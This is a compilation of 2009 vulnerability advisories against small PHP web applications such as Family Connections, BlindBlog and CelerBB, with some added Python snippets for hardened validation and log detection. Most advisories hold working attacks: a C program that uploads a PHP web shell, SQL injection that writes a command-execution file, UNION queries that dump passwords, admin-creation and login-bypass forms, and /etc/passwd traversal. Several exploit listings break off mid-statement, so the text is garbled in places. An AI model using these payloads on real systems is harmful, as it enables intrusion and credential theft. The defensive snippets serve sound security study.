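The request above, rebuilt and parsed the way the server sees it, as an added Python example (not Family Connections code). upload_document_as_shipped mirrors the quoted uploadDocument(): the client-declared Content-Type is the only gate and the client's file name is kept. upload_document_hardened decides on the real extension, requires it to agree with the declared type, and lets the server choose the stored name. The KNOWN_TYPES map is a subset of the advisory's $known_photo_types; the multipart body is constructed.

```python
# Added example, not Family Connections code: the advisory's POST rebuilt as a
# multipart body, parsed the way the server sees it, then run through a validator that
# mirrors uploadDocument() and through one that does not trust the declared type.
import os
import secrets
import tempfile
from email import message_from_bytes
from email.policy import default

BOUNDARY = b"AaB03x"

# Subset of the advisory's $known_photo_types map (declared type -> expected extension).
KNOWN_TYPES = {
    "application/msword": "doc",
    "text/plain": "txt",
    "application/pdf": "pdf",
    "application/zip": "zip",
}
ALLOWED_EXTENSIONS = set(KNOWN_TYPES.values())


def build_upload(filename: bytes, declared_type: bytes, content: bytes) -> bytes:
    """multipart/form-data body in the shape of the advisory's request (constructed)."""
    return (
        b"--" + BOUNDARY + b"\r\n"
        + b'Content-Disposition: form-data; name="doc"; filename="' + filename + b'"\r\n'
        + b"Content-Type: " + declared_type + b"\r\n"
        + b"\r\n" + content + b"\r\n"
        + b"--" + BOUNDARY + b"\r\n"
        + b'Content-Disposition: form-data; name="submitadd"\r\n\r\nSubmit\r\n'
        + b"--" + BOUNDARY + b"--\r\n"
    )


def parse_upload(body: bytes):
    """What PHP exposes as $_FILES['doc']: (declared type, client file name, content)."""
    raw = b"Content-Type: multipart/form-data; boundary=" + BOUNDARY + b"\r\n\r\n" + body
    msg = message_from_bytes(raw, policy=default)
    for part in msg.iter_parts():
        if part.get_param("name", header="content-disposition") == "doc":
            return part.get_content_type(), part.get_filename(), part.get_payload(decode=True)
    raise ValueError("no file part named 'doc'")


def upload_document_as_shipped(declared_type, filename, content, store_dir):
    """The quoted logic: the only gate is the client-declared Content-Type, and the file
    keeps the client's name, so file.php lands in gallery/documents/ as file.php."""
    if declared_type not in KNOWN_TYPES:
        return None
    dest = os.path.join(store_dir, os.path.basename(filename))
    with open(dest, "wb") as f:
        f.write(content)
    return dest


def upload_document_hardened(declared_type, filename, content, store_dir):
    """Decide on what the client cannot pick freely: the real extension must be in the
    allowlist and agree with the declared type; the stored name is chosen by the server.
    (Keep store_dir outside the document root as well, so nothing there is ever executed.)"""
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    if ext not in ALLOWED_EXTENSIONS or KNOWN_TYPES.get(declared_type) != ext:
        return None
    dest = os.path.join(store_dir, secrets.token_hex(16) + "." + ext)
    with open(dest, "wb") as f:
        f.write(content)
    return dest


def run_demo() -> dict:
    """Constructed request: file.php declared as text/plain, exactly as in the advisory."""
    declared, name, content = parse_upload(
        build_upload(b"file.php", b"text/plain", b"<?php echo 'This is not a text file'; ?>"))
    with tempfile.TemporaryDirectory() as store:
        shipped = upload_document_as_shipped(declared, name, content, store)
        hardened = upload_document_hardened(declared, name, content, store)
        benign = upload_document_hardened("text/plain", "notes.txt", b"hello", store)
        return {
            "declared_type": declared,
            "shipped_stores_php": shipped is not None and shipped.endswith("file.php"),
            "hardened_rejects_php": hardened is None,
            "hardened_accepts_txt": benign is not None and benign.endswith(".txt")
            and not os.path.basename(benign).startswith("notes"),
        }


if __name__ == "__main__":
    for check, result in run_demo().items():
        print(f"{check:24s} {result}")
```

Even the hardened version stores the file; what turns the bug into remote code execution is that gallery/documents/ sits under the document root and the web server executes .php there. Keep uploads outside the document root, or serve that directory with PHP execution disabled, in addition to the extension check.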


*

[+] Fix

No fix.


*

-- 
Salvatore drosophila Fresta
CWNP444351

Family Connections <= 1.8.2 - Remote Shell Upload Exploit

2009-04-03 Thread Salvatore drosophila Fresta
/*

Family Connections <= 1.8.2 - Remote Shell Upload Exploit

Author: Salvatore drosophila Fresta

Contact: drosophila...@gmail.com

Date: 3 April 2009

The following software will upload a simple php shell.
To execute remote commands, you must open the file
using a browser.

gcc rsue.c -o rsue

./rsue localhost /fcms/ user password

[*] Connecting...
[+] Connected
[*] Send login...
[+] Login Successful
[+] Uploading...
[+] Shell uploaded
[+] Connection closed

Open your browser and go to
http://localhost/fcms/gallery/documents/shell.php?cmd=[commands]

*/  

#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>

int socket_connect(char *server, int port) {

int fd;
struct sockaddr_in sock;
struct hostent *host;

memset(&sock, 0, sizeof(sock));

if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;

sock.sin_family = AF_INET;
sock.sin_port = htons(port);

if(!(host=gethostbyname(server))) return -1;

sock.sin_addr = *((struct in_addr *)host->h_addr);

if(connect(fd, (struct sockaddr *) &sock, sizeof(sock)) < 0) return -1;

return fd;

}

int socket_send(int socket, char *buffer, size_t size) {

if(socket < 0) return -1;

return write(socket, buffer, size) < 0 ? -1 : 0;

}

char *socket_receive(int socket, int tout) {

fd_set input;
int ret, byte;
char *buffer, *tmp;
struct timeval timeout;

FD_ZERO(&input);
FD_SET(socket, &input);

if(tout > 0) {
timeout.tv_sec  = tout;
timeout.tv_usec = 0;
}

if(socket < 0) return NULL;

/* one zeroed byte, so buffer is an empty string and strlen() below is defined */
if(!(buffer = (char *) calloc (1, sizeof (char)))) return NULL;

while (1) {

if(tout > 0)
ret = select(socket + 1, &input, NULL, NULL, &timeout);
else
ret = select(socket + 1, &input, NULL, NULL, NULL);

if (!ret) break;
if (ret < 0) return NULL;

if(!(tmp = (char *) calloc (1024, sizeof (char)))) return NULL;

/* read at most 1023 bytes so the chunk stays NUL-terminated */
if ((byte=read(socket, tmp, 1023)) < 0) return NULL;

if(!byte) { free(tmp); break; }

/* grow by the chunk length plus one byte for the terminating NUL */
if(!(buffer = (char *) realloc(buffer, strlen (buffer) + strlen
(tmp) + 1))) return NULL;

strcat(buffer, tmp);
free(tmp);

}

return buffer;

}

void usage(char *bn) {

printf("\nFamily Connections <= 1.8.2 - Remote Shell Upload Exploit\n"
"Author: Salvatore \"drosophila\" Fresta\n\n"
"usage: %s server path username password\n"
"example: %s localhost /fcms/ admin 123456\n\n", bn,
bn);

}

int main(int argc, char *argv[]) {

int sd;
char code[] = "--AaB03x\r\n"
"Content-Disposition: form-data; "
"name=\"doc\"; filename=\"shell.php\"\r\n"
"Content-Type: text/plain\r\n"
"\r\n"
"<?php echo \"<pre>\"; "
"system($_GET['cmd']); echo \"</pre>\"?>\r\n"
"--AaB03x\r\n"
"Content-Disposition: form-data; "
"name=\"desc\"\r\n"
"\r\n"
"description\r\n"
"--AaB03x\r\n"
"Content-Disposition: form-data; "
"name=\"submitadd\"\r\n"
"\r\n"
"Submit\r\n"
"--AaB03x--\r\n",
*buffer = NULL,
*rec = NULL,
*session = NULL;

if(argc < 5) {
usage(argv[0]);
return -1;
}

if(!(buffer = (char
*)calloc(200+strlen(code)+strlen(argv[1])+strlen(argv[2])+strlen(argv[3])+strlen(argv[4]),
sizeof(char)))) {
perror("calloc");
return -1;
}

sprintf(buffer, "POST %sindex.php HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Type: "
"application/x-www-form-urlencoded\r\n"
"Content-Length: "
"%d\r\n\r\nuser=%s&pass=%s&submit=Login",
argv[2], argv[1], (int)(strlen(argv[4])+strlen(argv[3])+24), argv[3],
argv[4]);


printf(\n

Family Connections 1.8.2 Blind SQL Injection (Correct Version)

2009-04-03 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***

[+] Application: Family Connection
[+] Version: <= 1.8.2
[+] Website: http://www.familycms.com

[+] Bugs: [A] Blind SQL Injection

[+] Exploitation: Remote
[+] Date: 1 Apr 2009

[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com


*

[+] Menu

1) Bugs
2) Code
3) Fix


*

[+] Bugs


- [A] Blind SQL Injection

[-] File affected: inc/util_inc.php

An SQL injection vulnerability in the authentication system
usually lets a guest bypass it, and that is exactly what
happens with the following cookies:

Cookie name: fcms_login_id
Cookie content: -1 UNION ALL SELECT
1,2,3,4,5,6,7,8,9,'admin','password',12,13,14,15,16,17,18,19,20,21,22
Cookie server: localhost (change it)
Cookie path: /

Cookie name: fcms_login_uname
Cookie content: admin
Cookie server: localhost (change it)
Cookie path: /

Cookie name: fcms_login_pw
Cookie content: password
Cookie server: localhost (change it)
Cookie path: /

However, the values in these cookies are also used by other
functions and queries, so it is not possible to browse the
vulnerable site with the permissions obtained this way: the
CMS terminates the session each time an SQL error is
encountered. For this reason, writing the result of the SQL
query to a file is a handy way around this limitation.

The following is the vulnerable code:

...

elseif (isset($_COOKIE['fcms_login_id'])) {
if (isLoggedIn($_COOKIE['fcms_login_id'],
$_COOKIE['fcms_login_uname'], $_COOKIE['fcms_login_pw'])) {
$_SESSION['login_id'] = $_COOKIE['fcms_login_id'];
$_SESSION['login_uname'] = $_COOKIE['fcms_login_uname'];
$_SESSION['login_pw'] = $_COOKIE['fcms_login_pw'];
}

...

in util_inc.php:

function isLoggedIn ($userid, $username, $password) {
// $userid comes straight from the cookie and is interpolated unquoted
$result = mysql_query("SELECT * FROM `fcms_users` WHERE `id` =
$userid LIMIT 1") or die('<h1>Login Error (util.inc.php 275)</h1>' .
mysql_error());
if (mysql_num_rows($result) > 0) {
$r = mysql_fetch_array($result);
// username and password are compared against whatever row the query returned
if ($r['username'] !== $username) { return false; } elseif
($r['password'] !== $password) { return false; } else { return true; }
} else {
return false;
}
}
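Added example, not the project's code: the cookie bypass above and the parameterised fix replayed in Python against a constructed in-memory SQLite table. The table, the account in it and the function names are assumptions; fcms_users is a three-column stand-in, so the advisory's 22-column payload is shortened to match.

```python
"""Why the fcms_login_id cookie gets past isLoggedIn(), and the fix.

Added example, not Family Connections code. isLoggedIn() above interpolates
the cookie value unquoted into the WHERE clause and then compares the
username and password it gets back from the database; a UNION row supplies
both of those values, so the check compares attacker data with attacker data.
This replays that logic against a constructed in-memory SQLite table
(3 columns instead of the CMS's 22) beside a parameterised version.
"""
import hmac
import sqlite3


def make_db():
    """Constructed stand-in for fcms_users holding one real account."""
    db = sqlite3.connect(':memory:')
    db.execute('CREATE TABLE fcms_users (id INTEGER PRIMARY KEY, '
               'username TEXT, password TEXT)')
    db.execute("INSERT INTO fcms_users VALUES (1, 'owner', 's3cret-hash')")
    return db


def is_logged_in_vulnerable(db, userid, username, password):
    """Port of the PHP: the cookie value is pasted straight into the SQL."""
    row = db.execute('SELECT * FROM fcms_users WHERE id = %s LIMIT 1'
                     % userid).fetchone()
    if row is None:
        return False
    return row[1] == username and row[2] == password


def is_logged_in_fixed(db, userid, username, password):
    """Treat the cookie value as data: integer-typed and bound as a parameter.

    A non-numeric cookie is rejected before any query runs, and the credential
    comparison is constant-time.
    """
    try:
        uid = int(userid)
    except (TypeError, ValueError):
        return False
    row = db.execute('SELECT username, password FROM fcms_users '
                     'WHERE id = ? LIMIT 1', (uid,)).fetchone()
    if row is None:
        return False
    return (hmac.compare_digest(row[0].encode(), username.encode())
            and hmac.compare_digest(row[1].encode(), password.encode()))


# The advisory's cookie value, shortened to the toy table's three columns
# (the original pads to 22 with 'admin','password' in positions 10 and 11).
FORGED_ID = "-1 UNION ALL SELECT 1,'admin','password'"


def demo():
    """Run both versions against the same table; every value should be True."""
    db = make_db()
    return {
        'vulnerable_accepts_forged':
            is_logged_in_vulnerable(db, FORGED_ID, 'admin', 'password'),
        'fixed_rejects_forged':
            not is_logged_in_fixed(db, FORGED_ID, 'admin', 'password'),
        'fixed_accepts_real':
            is_logged_in_fixed(db, '1', 'owner', 's3cret-hash'),
        'fixed_rejects_wrong_password':
            not is_logged_in_fixed(db, '1', 'owner', 'wrong'),
    }
```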


*

[+] Code


- [A] Blind SQL Injection

/*

Family Connection <= 1.8.2 - Remote Command Execution

Proof of Concept - Written by Salvatore drosophila Fresta

The following program creates a file (rce.php) in the
specified path using the Blind SQL Injection bug. To execute
remote commands, you must open the file using a browser.

*/  

#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>

int socket_connect(char *server, int port) {

int fd;
struct sockaddr_in sock;
struct hostent *host;

memset(&sock, 0, sizeof(sock));

if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;

sock.sin_family = AF_INET;
sock.sin_port = htons(port);

if(!(host=gethostbyname(server))) return -1;

sock.sin_addr = *((struct in_addr *)host->h_addr);

if(connect(fd, (struct sockaddr *) &sock, sizeof(sock)) < 0) return -1;

return fd;

}

int socket_send(int socket, char *buffer, size_t size) {

if(socket < 0) return -1;

return write(socket, buffer, size) < 0 ? -1 : 0;

}

void usage(char *bn) {

printf("\n\nFamily Connection <= 1.8.2 - Remote Command Execution\n"
"Proof of Concept - Written by Salvatore \"drosophila\" "
"Fresta\n\n"
"usage: %s server path fs_path\n"
"example: %s localhost /fcms/ "
"/var/www/htdocs/fcms/\n\n", bn, bn);

}

int main(int argc, char *argv[]) {

int sd;
/* ';' is sent as %3b because the string travels inside a Cookie header */
char code[] = "'<?php echo \"<pre>\"%3b system($_GET[cmd])%3b echo "
"\"</pre><br><br>\"%3b?>'",
*buffer;

if(argc < 4) {
usage(argv[0]);
return -1;
}

/* the request template, the code string and the three arguments must all fit */
if(!(buffer = (char
*)calloc(216+strlen(code)+strlen(argv[1])+strlen(argv[2])+strlen(argv[3]),
sizeof(char)))) {
perror("calloc");
return -1;
}

sprintf(buffer, "GET %shome.php HTTP/1.1\r\n"
"Host: %s\r\n"
"Cookie: fcms_login_id=-1 UNION ALL "
"SELECT "
"%s,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE "
"'%srce.php'#\r\n\r\n",
argv[2], argv[1], code, argv[3

Family Connections 1.8.1 Multiple Remote Vulnerabilities

2009-03-30 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***

[+] Application: Family Connection
[+] Version: 1.8.1
[+] Website: http://www.familycms.com

[+] Bugs: [A] Multiple SQL Injection
  [B] Create Admin User
  [C] Blind SQL Injection   

[+] Exploitation: Remote
[+] Date: 25 Mar 2009

[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com


*

[+] Menu

1) Bugs
2) Code
3) Fix


*

[+] Bugs


- [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = on/off

These bugs allow a registered user to view the
username and password of every registered user.


- [B] Create Admin User

[-] Requisites: magic_quotes_gpc = off
[-] File affected: register.php, activate.php

This bug allows a guest to create an account with
administrator privileges.


- [C] Blind SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: lostpw.php


*

[+] Code


- [A] Multiple SQL Injection

http://www.site.com/path/addressbook.php?letter=-1%25' UNION ALL
SELECT 1,2,NULL,username,5,password,email FROM fcms_users%23

http://www.site.com/path/recipes.php?category=1&id=1 UNION SELECT
1,2,username,password,5,6 FROM fcms_users

http://www.site.com/path/home.php?poll_id=-1 UNION ALL SELECT
1,NULL,3,CONCAT(username, 0x3a, password) FROM fcms_users%23


- [B] Create Admin User

<html>
  <head>
    <title>Family Connection 1.8.1 Create Admin User Exploit</title>
  </head>
  <body>
    <p>This exploit creates a user with administrator privileges
    using the following information:<br>
       Username: root<br>
       Password: toor<br>
    <form action="http://localhost/fcms/register.php" method="POST">
      <input type="hidden" name="username" value="blabla">
      <input type="hidden" name="password" value="blabla">
      <input type="hidden" name="email" value="bla...@blabla.blabla">
      <input type="hidden" name="fname" value="blabla">
      <input type="hidden" name="lname" value="blabla">
      <input type="hidden" name="year"
value="00-00-000','fakeuser','fakepassword'), (1, NOW(), 'root',
'root', 'r...@owned.com', '00-00-00', 'root',
'7b24afc8bc80e548d66c4e7ff72171c5')#'">
      <input type="submit" name="submit" value="Exploit">
    </form>
  </body>
</html>

To activate accounts:

http://www.site.com/path/activate.php?uid=1 or 1=1&code=


- [C] Blind SQL Injection

POST /path/lostpw.php HTTP/1.1\r\n
Host: www.site.com\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 193\r\n\r\n
email=-1' UNION ALL SELECT '<?php echo "<pre>"; system($_GET[cmd]);
echo "</pre><br><br>";?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
INTO OUTFILE '/var/www/htdocs/path/rce.php'#

To execute commands:

http://www.site.com/path/rce.php?cmd=ls


*

[+] Fix

No fix.


*

-- 
Salvatore drosophila Fresta
CWNP444351

Community CMS 0.5 Multiple SQL Injection Vulnerabilities

2009-03-30 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***

[+] Application: Community CMS
[+] Version: 0.5
[+] Website: http://sourceforge.net/projects/communitycms/

[+] Bugs: [A] Multiple SQL Injection

[+] Exploitation: Remote
[+] Dork: intext:Powered by Community CMS
[+] Date: 30 Mar 2009

[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com


*

[+] Menu

1) Bugs
2) Code
3) Fix


*

[+] Bugs


- [A] SQL Injection

[-] File affected: view.php, calendar.php

This bug allows a guest to view the username and
password of a registered user.


*

[+] Code


- [A] Multiple SQL Injection

http://www.site.com/path/view.php?article_id=-1 UNION ALL SELECT
1,2,username,password,5,6,7,8,9 FROM comcms_users

http://www.site.com/path/index.php?id=2&view=event&a=-1 UNION ALL
SELECT 1,2,3,4,5,6,7,CONCAT(username, 0x3a,
password),NULL,NULL,NULL,12,13,NULL FROM comcms_users%23


*

[+] Fix

No fix.


*

-- 
Salvatore drosophila Fresta
CWNP444351

phpCommunity 2 2.1.8 Multiple Vulnerabilities (SQL Injection / Directory Traversal / XSS)

2009-03-09 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***

[+] Application: phpCommunity 2
[+] Version: 2.1.8
[+] Website: http://sourceforge.net/projects/phpcommunity2/

[+] Bugs: [A] Multiple SQL Injection
  [B] Directory Traversal
  [C] Reflected XSS

[+] Exploitation: Remote
[+] Date: 07 Mar 2009

[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com


*

[+] Menu

1) Bugs
2) Code
3) Fix


*

[+] Bugs


This web application has several vulnerabilities
that can be exploited to obtain restricted information.
The following are examples of the vulnerabilities
discovered in this application.


- [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: module/forum/class_forum.php
   module/forum/class_search.php

This bug allows a guest to view the username and
password of a registered user.


- [B] Directory Traversal

[-] Requisites: none
[-] File affected: module/admin/files/show_file.php,
   module/admin/files/show_source.php

This bug allows a guest to read arbitrary files and
directory listings on the web server.


- [C] Reflected XSS

[-] Requisites: none
[-] File affected: templates/1/login.php


*

[+] Code


- [A] Multiple SQL Injection

http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=1&forum_id=-1'
UNION ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM
com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=2&forum_id=0&topic_id=-1'
UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM
com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=search&s=id&wert=-1%25;
UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=search&s=nick&wert=-1%25;
UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25;
UNION ALL SELECT 1,2,3,4,CONCAT(nick, 0x3a, pwd),6 FROM com_users%23


- [B] Directory Traversal

http://www.site.com/path/module/admin/files/show_file.php?file=../../../../../../../../etc/passwd

http://www.site.com/path/module/admin/files/show_source.php?path=/etc


- [C] Reflected XSS

http://www.site.com/path/templates/1/login.php?msg=<script>alert('XSS');</script>


*

[+] Fix

No fix.


*

-- 
Salvatore drosophila Fresta
CWNP444351

nForum 1.5 Multiple SQL Injection

2009-03-06 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***

[+] Application: nForum
[+] Version: 1.5
[+] Website: http://sourceforge.net/projects/nforum/

[+] Bugs: [A] Multiple SQL Injection

[+] Exploitation: Remote
[+] Date: 06 Mar 2009

[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com


*

[+] Menu

1) Bugs
2) Code
3) Fix


*

[+] Bugs


- [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: showtheme.php, userinfo.php

These bugs allow a guest to view the username and
password of a registered user.


*

[+] Code


- [A] Multiple SQL Injection

http://www.site.com/path/showtheme.php?id=-1' UNION ALL SELECT
1,2,CONCAT(name, 0x3a, passwd_hash),NULL,5,6,7 FROM users%23

http://www.site.com/path/userinfo.php?user=-1' UNION ALL SELECT
1,2,3,4,5,6,7,8,CONCAT(name, 0x3a, passwd_hash),10,11,12 FROM users%23


*

[+] Fix

No fix.


*

-- 
Salvatore drosophila Fresta
CWNP444351

CelerBB 0.0.2 Multiple Vulnerabilities

2009-03-05 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***

[+] Application: CelerBB
[+] Version: 0.0.2
[+] Website: http://celerbb.sourceforge.net/

[+] Bugs: [A] Multiple SQL Injection
  [B] Information Disclosure
  [C] Authentication Bypass

[+] Exploitation: Remote
[+] Date: 05 Mar 2009

[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com


*

[+] Menu

1) Bugs
2) Code
3) Fix


*

[+] Bugs


- [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: viewforum.php, viewtopic.php

This bug allows a guest to view the username and
password list.


- [B] Information Disclosure

[-] Requisites: none
[-] File affected: showme.php

This bug allows a guest to view reserved
information of any user.


- [C] Authentication Bypass

[-] Requisites: magic_quotes_gpc = off
[-] File affected: login.php

This bug allows a guest to bypass authentication.


*

[+] Code


- [A] Multiple SQL Injection

http://www.site.com/path/viewforum.php?id=-1' UNION ALL SELECT
1,2,GROUP_CONCAT(CONCAT(username, 0x3a, password)),4,5,6,7,8 FROM
celer_users%23

http://www.site.com/path/viewtopic.php?id=1' UNION ALL SELECT
1,2,3,NULL,5,6,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL
FROM celer_users%23


- [B] Information Disclosure

http://www.site.com/path/showme.php?user=admin


- [C] Authentication Bypass

<html>
  <head>
    <title>CelerBB 0.0.2 Authentication Bypass Exploit</title>
  </head>
  <body>
    <form action="login.php" method="POST">
      <input type="hidden" name="Username" value="admin'#">
      <input type="submit" value="Exploit">
    </form>
  </body>
</html>


*

[+] Fix

No fix.


*

-- 
Salvatore drosophila Fresta
CWNP444351

WARNING - CORRECT: BlindBlog 1.3.1 Multiple Vulnerabilities (SQL Inj - Auth Bypass - LFI)

2009-03-03 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***

[+] Application: BlindBlog
[+] Version: 1.3.1
[+] Website: http://sourceforge.net/projects/cbblog/

[+] Bugs: [A] SQL Injection
         [B] Authentication Bypass
         [C] Local File Inclusion

[+] Exploitation: Remote
[+] Date: 03 Mar 2009

[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com


*

[+] Menu

1) Bugs
2) Code
3) Fix


*

[+] Bugs


- [A] SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: comment.php

All queries are vulnerable.
This bug allows a guest to view the username and
password of a registered user.

$id = (isset($_GET['id']) && $_GET['id'] !='') ?  $_GET['id'] : getlastid();

       $SQL = "SELECT comment,author,contact,date FROM `cblog_comments`
WHERE `pid` = '$id' ORDER BY `cid` DESC";
       $resulted = $db->query($SQL, $querys);
       while ($result = mysql_fetch_assoc($resulted))
               $comments[] = $result;


- [B] Authentication Bypass

[-] Requisites: magic_quotes_gpc = off
[-] File affected: admin.login.php

       $username = $_POST['username'];
       $password = md5($_POST['password']);
       include('./db_config.php');
       $db = new db_stuff;
       $db->connect();
       $result = $db->query("SELECT * FROM `cblog_users` WHERE `username` =
'$username'", $querys);
       if (mysql_num_rows($result) < 1 || mysql_num_rows($result) > 1)
       {
               echo "Incorrect username";
               exit;
       }
       $result = mysql_fetch_assoc($result);
       if ($result['password'] !== $password)
       {
               echo 'Incorrect Password';
               exit;
       }


- [C] Local File Inclusion

[-] Requisites: none
[-] File affected: admin.php

This bug allows an admin to include local files.
Authentication can be bypassed using the
previous bug.
With this bug it is possible to execute remote
commands using the Apache logs.

...
} else if (isset($_GET['act']) && $_SESSION['is_admin'])
{
       $loc = 'admin.'.$_GET['act'].'.php';
       include('./'.$loc);
}
...


*

[+] Code


- [A] SQL Injection

http://www.site.com/path/comment.php?id=-1' UNION ALL SELECT
NULL,CONCAT(username, char(58), password),3,4 FROM cblog_users%23


- [B] Authentication Bypass

<html>
       <head>
               <title>BlindBlog 1.3.1 Authentication Bypass Exploit</title>
       </head>
       <body>
               <form
action="http://www.site.com/path/admin/admin.login.php?go=1"
method="POST">
                       <input type="hidden" name="username" value="-1'
UNION ALL SELECT
1,'admin',MD5('expl')#">
                       <input type="hidden" name="password" value="expl">
                       <input type="submit" value="Exploit">
               </form>
       </body>
</html>


- [C] Local File Inclusion

Tested on MAC OSX: /Applications/xampp/xamppfiles/htdocs/cbblog/admin/admin.php

http://www.site.com/path/admin/admin.php?act=/../../../../../../../etc/passwd%00
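Added example, not part of the advisory: Python access-log triage that flags the request patterns appearing in these advisories (UNION-based SQL injection, INTO OUTFILE writes, the tautology in activate.php, directory traversal with a trailing null byte, and a reflected script tag). The log format, rule names and log lines are constructed for the example; the request targets are the advisories' own, against a placeholder path.

```python
"""Access-log triage for the request patterns in these advisories.

Added example, not from the advisory: each request target is percent-decoded
and checked for the payload classes shown on this page. Log lines are
constructed in Apache combined format; the targets are the advisories' own.
"""
import re
from urllib.parse import unquote_plus

# Each rule: (label, regex applied to the decoded request target)
RULES = [
    ('sqli-union', re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.IGNORECASE)),
    ('sqli-outfile', re.compile(r"\binto\s+(?:out|dump)file\b", re.IGNORECASE)),
    ('sqli-tautology', re.compile(r"\bor\s+1\s*=\s*1\b", re.IGNORECASE)),
    ('lfi-traversal', re.compile(r"(?:\.\./){2,}")),
    ('lfi-nullbyte', re.compile(r"\x00")),
    ('xss-script', re.compile(r"<script\b", re.IGNORECASE)),
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def decode_target(target):
    """Percent-decode twice so a double-encoded payload is still seen."""
    return unquote_plus(unquote_plus(target))


def classify(target):
    """Return the sorted list of rule labels matching one request target."""
    decoded = decode_target(target)
    return sorted(label for label, rx in RULES if rx.search(decoded))


def scan(lines):
    """Return (ip, target, labels) for every log line that triggers a rule."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        labels = classify(m.group('target'))
        if labels:
            hits.append((m.group('ip'), m.group('target'), labels))
    return hits


# Constructed log lines; the request targets are taken from the advisories.
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Mar/2009:10:00:01 +0000] "GET /path/comment.php?id=-1%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(username,%20char(58),%20password),3,4%20FROM%20cblog_users%23 HTTP/1.1" 200 1533',
    '203.0.113.5 - - [03/Mar/2009:10:00:07 +0000] "GET /path/admin/admin.php?act=/../../../../../../../etc/passwd%00 HTTP/1.1" 200 2090',
    '203.0.113.5 - - [03/Mar/2009:10:00:12 +0000] "GET /path/templates/1/login.php?msg=%3Cscript%3Ealert(%27XSS%27);%3C/script%3E HTTP/1.1" 200 510',
    '203.0.113.5 - - [03/Mar/2009:10:00:20 +0000] "GET /path/activate.php?uid=1%20or%201=1&code= HTTP/1.1" 200 310',
    '198.51.100.7 - - [03/Mar/2009:10:01:00 +0000] "GET /path/comment.php?id=12 HTTP/1.1" 200 4021',
    '198.51.100.7 - - [03/Mar/2009:10:01:03 +0000] "GET /path/admin/admin.php?act=posts HTTP/1.1" 200 880',
]

if __name__ == '__main__':
    for ip, target, labels in scan(SAMPLE_LOG):
        print(ip, ','.join(labels), target)
```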

-- 
Salvatore drosophila Fresta
CWNP444351


BlindBlog 1.3.1 Multiple Vulnerabilities (SQL Inj - Auth Bypass - LFI)

2009-03-03 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***

[+] Application: BlindBlog
[+] Version: 1.3.1
[+] Website: http://sourceforge.net/projects/cbblog/

[+] Bugs: [A] SQL Injection
  [B] Authentication Bypass
  [C] Local File Inclusion

[+] Exploitation: Remote
[+] Date: 03 Mar 2009

[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com


*

[+] Menu

1) Bugs
2) Code
3) Fix


*

[+] Bugs


- [A] SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: comment.php

All queries are vulnerable.
This bug allows a guest to view the username and
password of a registered user.

$id = (isset($_GET['id']) && $_GET['id'] !='') ?  $_GET['id'] : getlastid();

$SQL = "SELECT comment,author,contact,date FROM `cblog_comments`
WHERE `pid` = '$id' ORDER BY `cid` DESC";
$resulted = $db->query($SQL, $querys);
